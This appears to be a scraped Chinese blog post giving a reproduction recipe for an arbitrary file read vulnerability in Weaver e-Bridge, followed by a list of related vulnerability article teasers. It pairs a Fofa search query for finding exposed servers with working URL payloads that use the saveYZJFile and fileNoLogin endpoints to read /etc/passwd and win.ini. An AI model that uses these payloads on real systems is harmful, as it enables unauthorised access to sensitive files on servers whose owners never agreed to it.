泛微云桥e-Bridge-任意文件读取漏洞
1.资产查找
Fofa: title="泛微云桥 e-Bridge"
2.漏洞描述
泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
3.漏洞复现
1)Linux服务器
(1)在URL后添加payload
payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
(2)在URL后添加/file/fileNoLogin/上一步返回的id
payload:/file/fileNoLogin/fa38f21af951482bb450d1ce3e6a7b49
2)Windows服务器
(1)在URL后添加payload
payload :/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
(2)在URL后添加/file/fileNoLogin/上一步返回的id
payload:/file/fileNoLogin/9ecccbde436e4d3d8d34ef63274d4d4d
泛微云桥e-Bridge-任意文件读取漏洞相关推荐
- 安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
- gitlab 更新文件_GitLab任意文件读取漏洞公告
2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...
- phpcms前台注入导致任意文件读取漏洞
关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...
- Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
- mysql任意文件读取漏洞学习
前言 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data ...
- CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...
- php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复
修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...
- .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)
一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...
- php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】
PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危 漏洞POC: PHPMa ...
- 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
漏洞描述: 银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件. 漏洞利用条件: / 漏洞影响范围: 银达汇智 智慧综合管理平 ...
最新文章
- Verilog中Dump函数及用法
- 循序渐进学Oracle之索引、权限、角色
- android studio工程特点,Android Studio的重要特性
- [ASP]没有权限: 'CreateObject'
- MATLAB半色调,基于改进协方差矩阵的半色调图像分类研究
- java 无锁框架_高性能无锁并发框架 Disruptor,太强了!
- n皇后问题c语言报告,关于N皇后问题
- 数据转换软件公司——HYFsoft
- javascript---继承
- Android APP 稳定性测试工具—Fastboot使用教程
- 计算机图形学(闫令琪博士课程答疑)-Shading(二)
- 使用 Kind 搭建你的本地 Kubernetes 集群
- 笔记本计算机的功率一般多少,笔记本电脑功率是多少 怎么看笔记本功率多大...
- mysql三叶草,温州日报瓯网 - 面对温州话,你被困住了吗?
- 为原型产品推荐的四款设计工具
- Asio Streams, Short Reads and Short Writes
- 微信中h5中的视频无法播放,提示视频解析失败的根本原因。
- 响应式网页设计_响应式网页设计:我们从这里去哪里?
- 单片机学多久能工作,单片机学好了能应聘什么工作?
- 公司职员信息管理系统